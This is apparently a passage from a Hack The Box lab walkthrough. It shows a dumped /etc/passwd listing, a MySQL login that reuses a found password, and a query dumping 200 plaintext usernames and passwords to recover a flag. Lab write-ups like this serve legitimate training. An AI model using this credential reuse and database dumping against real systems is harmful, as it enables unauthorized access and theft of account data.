tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ubuntu:x:1000:1000:ubuntu:/home/ubuntu:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
cry0l1t3:x:1001:1001:,,,:/home/cry0l1t3:/bin/bash
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
tom:x:1002:1002:,,,:/home/tom:/bin/bash
dovecot:x:113:120:Dovecot mail server,,,:/usr/lib/dovecot:/usr/sbin/nologin
dovenull:x:115:121:Dovecot login user,,,:/nonexistent:/usr/sbin/nologin
Debian-snmp:x:116:122::/var/lib/snmp:/bin/falseWe find mail, web (www-data), and Tom’s account. We also see a MySQL user indicating there’s a database on this server.
Login to MySQL with the credentials we found earlier
Try logging in to MySQL using the tom username and the password we found earlier (NMds732Js2761, which seems to be reused everywhere).
mysql -u tom -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 8.0.27-0ubuntu0.20.04.1 (Ubuntu)
Copyright (c) 2000, 2021, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
| users |
+--------------------+
5 rows in set (0.01 sec)
mysql>
We see a users database.
Examine the users database
Change to the users database and show the tables. There is a users table within the users database.
mysql> use users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables
-> ;
+-----------------+
| Tables_in_users |
+-----------------+
| users |
+-----------------+
1 row in set (0.00 sec)Show the columns from the users table. It’s a user table with a username and password column. Query both columns from the database.
mysql> show columns from users
-> ;
+----------+-------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+----------+-------------+------+-----+---------+-------+
| id | int | YES | | NULL | |
| username | varchar(50) | YES | | NULL | |
| password | varchar(50) | YES | | NULL | |
+----------+-------------+------+-----+---------+-------+
3 rows in set (0.01 sec)
mysql> select username, password from users;
+-------------------+------------------------------+
| username | password |
+-------------------+------------------------------+
| ppavlata0 | 6znAfvTbB2 |
| ktofanini1 | TP2NxFD62e |
| rallwell2 | t1t7WaqvEfv |
| efernier3 | ZRYOBO9PI |
| fpoon4 | 5Spyx2Jb |
| jgurnell5 | LMCnWKD |
| aminter6 | ngCyGg3 |
| dwattinham7 | H2bpGC5 |
| ddumphreys8 | eGek5Q8 |
| etookey9 | kXBd88ZX |
| mlindbacka | H9uTnIvli92 |
| awebbeb | RALeM2IfuwA |
| tswannellc | oHdZWwO9 |
| slydiattd | r3wRgn |
| cparslowe | nVdJAHr |
| sheartfieldf | ofTf0hE7OL |
| aalvesg | diTzuE |
| eshilstoneh | NVSRa5L8Lx |
| eludovicoi | w2uUtLGYkDi |
| rcoppenhallj | 8T1AO16C4pm |
| rfuxmank | oOVWyPyo |
| tmoraledal | CDNj7KH |
| vdurdanm | KBM4BTldF |
| mlandisn | oCOZcC |
| gfancutto | RNHlBaFKLLt |
| dfigliovannip | Cf7T9osx |
| ngoedeq | eDfTnH |
| abalhamr | Qc2Tia0zM |
| tmartys | VC65xd6o |
| sallewellt | Y5VSv1rm |
| mjoveyu | ej3amn |
| mgoodlifev | lCbzNIw7B90 |
| gmargeramw | hbVF2G |
| leberlex | Nj6UCAQ |
| mtrimbyy | jfNkfg5ZW |
| mkimmz | pZZepTCVlkN |
| mflaunier10 | 9TZ8mfLA |
| vgomes11 | qM6nHjMtD |
| sbrimham12 | FoXudHc4Ocr |
| cbendle13 | zFUIGVBx |
| ralgeo14 | YTB8IXOk |
| rsandyfirth15 | vARbkPRQv |
| bcarlesi16 | m4H6q6pH |
| cfrude17 | Za8UHiSe25N |
| rjullian18 | 6QyxSjg |
| bgissing19 | fjes6w8Ovw0 |
| limore1a | gVzkv8syQ |
| scarlisle1b | sR9rPBL5 |
| hamoss1c | tbmK9XBhn57j |
| cradmore1d | TQkfKxEl7 |
| apetican1e | ABibihOvMOu |
| eweber1f | sEDynNORm7b |
| nbockmaster1g | M1tVaH |
| cianne1h | Vc8agpinq |
| khatchette1i | xXOnQFOsF0I |
| tkroger1j | uisR7g1eVEU |
| sgladtbach1k | iIVQ4l |
| bmockford1l | BBsZPmwk0r |
| balabone1m | aTUbGm0 |
| jmantripp1n | DTVAdvbadbA2 |
| tchown1o | dCulXiBc |
| vconradsen1p | v5E0sgqzo |
| hfudge1q | cSODbEMtCm |
| syaneev1r | ilXo6tKGHY7 |
| btheyer1s | LxNk1t |
| fcahn1t | oSBmcLx |
| edurrington1u | LMomwfQkq3 |
| kcounter1v | 1zUE6RHS |
| bqueripel1w | 0A2OfeQPnhd |
| mnacci1x | lNyUiY8U4t |
| dcabell1y | W6Q7R3zsxB |
| ctaleworth1z | d3JWwTj |
| mmcgrah20 | yPxlvhS |
| jgannaway21 | oGfIrDxkSIo |
| eiacovone22 | 8jKlhgvC |
| rnaughton23 | Gyf6awYCm4 |
| adobbins24 | ashZ0G |
| pwarbeys25 | nSmfKSYW9GL |
| bbrabbins26 | YZWuH6D8Q |
| adandy27 | dF1VPsn |
| mfarrens28 | ucPclA8K9c |
| dhaysar29 | MeGzIGeyKXyw |
| efoot2a | Q2ks5eg |
| tpelosi2b | 8yjhdx |
| binman2c | 3uO3PeL8e |
| krait2d | EFD5FpEtu2 |
| jcrook2e | VFsdmvhDz4O |
| falonso2f | 4ifO54 |
| jmacak2g | KUDAxTXU |
| nnorville2h | WCYa9C1G |
| tlevington2i | If46bHoGr |
| abartak2j | erFX4u0e0 |
| jgoad2k | gunnsPy1pMCd |
| dwadham2l | 89IiRFy0frst |
| hvenditti2m | NS0U18XON |
| gpitchers2n | j7RVE2 |
| aiskowitz2o | 8iVpSQUEXn2K |
| gcars2p | 8i3nsQU9wp |
| bjacke2q | 2PtrA0C |
| fstorton2r | XmjbfR1vK1 |
| pbrinded2s | Jf9uWJ |
| penriques2t | o3kmQ5zHF5Qb |
| awinckworth2u | LEwOydD3nncQ |
| lkinsell2v | kvoIZupHNt |
| wdavisson2w | nk5HVS |
| rrenzini2x | LiCJccRxumYU |
| kdavys2y | ZXpRVEn |
| ravann2z | YLkKN4JzzM |
| hrallings30 | 6wS4x0IeLW |
| sbrackpool31 | lBa8AVaPQg |
| epulham32 | yIV88FM9DM |
| mspeachley33 | JSa9aUv1h |
| vforkan34 | 26Q6gTgsOE8T |
| jprichard35 | sggVPPMfRA3T |
| abisatt36 | GcSlKIuky |
| todocherty37 | BwSfFV3qj |
| njayne38 | D8yr44NNQ |
| gwhyman39 | h0WJ4p2F2x8 |
| lkristoffersson3a | mARndSF |
| lmcallan3b | gmpkAKF |
| kdouble3c | qYtstjmdR |
| sgooding3d | venooIUMMHE |
| lgaffney3e | 1fCwgoaCtz |
| emuriel3f | Wz582Y22 |
| mlamasna3g | MhqsPNMRYwJE |
| omander3h | CuB3JbXJ |
| fropkes3i | jVBeawjIPXS |
| mhawk3j | g0sPpI8 |
| wseres3k | zgsXeR7blA |
| bflaws3l | 0dTvgBkaFYqi |
| ccyson3m | EtCscA |
| afowell3n | cRG0x5 |
| jmolian3o | fCwa9ry |
| gterzo3p | Srv77g |
| ravrahamy3q | dFjfFMEJ |
| amaden3r | n1WAtKT |
| gdeverall3s | 1Vj3bbr |
| ejansema3t | 4MyiArdEVq |
| snormanville3u | l1s9Ao9omd |
| nfinder3v | Rd1POwc3 |
| lrodway3w | UNW82GQfd0q |
| lstening3x | JaSkROwU83UB |
| hemer3y | GlPpKB |
| eblamphin3z | 7Zjz7RvcC9x |
| lwederell40 | eyWsJl |
| nverick41 | Mr1r2H |
| mlawlie42 | XrHEZJbuUd |
| swahlberg43 | 46gOiZ |
| crubinivitz44 | FLlYii1mQz84 |
| HTB | cr3n4o7rzse7rzhnckhssncif7ds |
| wdoswell46 | FYXMuelBVcS |
| ccollingwood47 | LM6SU2N3w7KQ |
| nfoux48 | N40DfFww |
| gboyat49 | W1LDy7 |
| csuddick4a | UIGXl3lL |
| tmatieu4b | c5PYl7yfJi |
| ielsy4c | 3hLC705Oj |
| ebotwood4d | aQmW5c7 |
| gcirlos4e | SPsU9obCa |
| smucklestone4f | Ho96mUx |
| hdain4g | BGMRtb |
| dmcquillin4h | 37kwHEdFhAlL |
| gfolan4i | 1d9kcofM |
| gtamlett4j | 4HlL18RM37l3 |
| cchapelle4k | xezsRgOt8OW8 |
| channy4l | 68lHKp |
| ffennick4m | jNLpCeyoYY |
| mmcgarrell4n | Ttvat7WvkI |
| mmcdowell4o | jfOR6B |
| sconquer4p | ase5Qid5vWD |
| hskune4q | UUoqC30g5w |
| mblasli4r | dcjNDHzrA |
| sefford4s | ui0r4FKwD38 |
| gscotter4t | f2vUKUzHLmEW |
| nmenhenitt4u | gXHceINuKdF |
| laldridge4v | 7o4agC3m |
| rlingner4w | 8mYREIR7 |
| mmcfall4x | sd3N0GDK |
| smoscon4y | BCPAyKFkKKL |
| ggillespey4z | LHyQ7f4Br |
| onewberry50 | aKdinUPQ9r |
| dinsley51 | hy8agAF9c4VS |
| mcommon52 | Buh2VR |
| bmosdill53 | IgNAGOBrzlu |
| rrobart54 | SkBqsiQGSK |
| hdurrance55 | 1cljoZoy7Fc |
| hwinterflood56 | F9PH0X0 |
| jbier57 | Ug88Nd37N96v |
| hmaccumeskey58 | 3rb3rz2kq2 |
| orangell59 | IWz01iHsv |
| velsie5a | mWcslVm2 |
| igeorgelin5b | 6WHS6OS |
| rrushsorth5c | hXiQn9bW6W |
| mbrucker5d | cT5Z6K |
| darnull5e | EzagIo6Sd |
| jparkhouse5f | HCEchNzf |
| smcgunley5g | 9ivT96O |
| ssoal5h | qi6WX7TGIA |
| npeak5i | 3gR7Iuc0 |
| mleidl5j | qwfjY9RGk6 |
+-------------------+------------------------------+
200 rows in set (0.01 sec)
We find the flag is in the password field for the HTB user.
| HTB | cr3n4o7rzse7rzhnckhssncif7ds |
